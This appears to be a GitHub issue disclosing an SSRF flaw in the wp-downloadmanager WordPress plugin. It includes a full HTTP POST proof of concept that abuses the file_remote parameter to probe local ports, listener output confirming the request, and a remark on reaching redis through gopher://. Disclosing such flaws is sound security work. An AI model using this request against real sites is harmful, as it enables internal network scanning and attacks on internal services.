SSRF vulnerability in download-add.php

Question

SSRF vulnerability in download-add.php

nenf opened this issue 4 years ago · 0 comments

Hi, support team!

There is SSRF vulnerability in plugin. Any user can exploit it, for example to identify open local prots.

Vulnerable action is - wp-downloadmanager/download-add.php
Vulnerable parameters is - file_remote

For example hacker can set http://127.0.0.1:3306 value in file_remote parameter and understand status of 3306 port. If port is open server will be waiting answer from service on 3306, else server return answer instantly

POC:

POST /wp-admin/admin.php?page=wp-downloadmanager/download-add.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:86.1) Gecko/20100101 Firefox/86.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/wp-admin/admin.php?page=wp-downloadmanager%2Fdownload-add.php
Content-Type: multipart/form-data; boundary=---------------------------393575653922464158771860946663
Content-Length: 2619
Origin: http://127.0.0.1:8000
Connection: close
Cookie: wordpress_4411def9d576984c8d78253236b2a62f=test%7C1595422269%7CjLVc1fVTQN34gtfpV8rqQrsXl17ygiTd8Q9pYOhaMWO%7C9bcfc3624c68ed4a056e468f17f2eefffb6da09f89b04b5b0c3d3d4db5537090; pma_lang=ru; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1595165328; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_4411def9d576984c8d78253236b2a62f=test%7C1595422269%7CjLVc1fVTQN34gtfpV8rqQrsXl17ygiTd8Q9pYOhaMWO%7Cb271733df202a3ca343f4cedcce5efb9c2351595f6136016e234e9de20eed961
Upgrade-Insecure-Requests: 1

-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="MAX_FILE_SIZE"

31457280
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="_wpnonce"

3982de2ab5
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/admin.php?page=wp-downloadmanager/download-add.php
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file"

/test.txt
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream


-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_type"

2
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_remote"

http://127.0.0.1:3306
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_name"


-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_des"


-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_cat"

0
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_size"


-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_day"

20
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_month"

7
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_year"

2020
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_hour"

13
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_minute"

9
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_timestamp_second"

28
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_hits"

0
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="file_permission"

-1
-----------------------------393575653922464158771860946663
Content-Disposition: form-data; name="do"

Add File
-----------------------------393575653922464158771860946663--

I was listening 3306 port on backend (127.0.0.1), and got requsest from the 127.0.0.1 server:

connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 45588
GET / HTTP/1.0
Host: 127.0.0.1:3306
Connection: close

Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using gopher:// scheme)

To prevent vulnerability use next manual: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html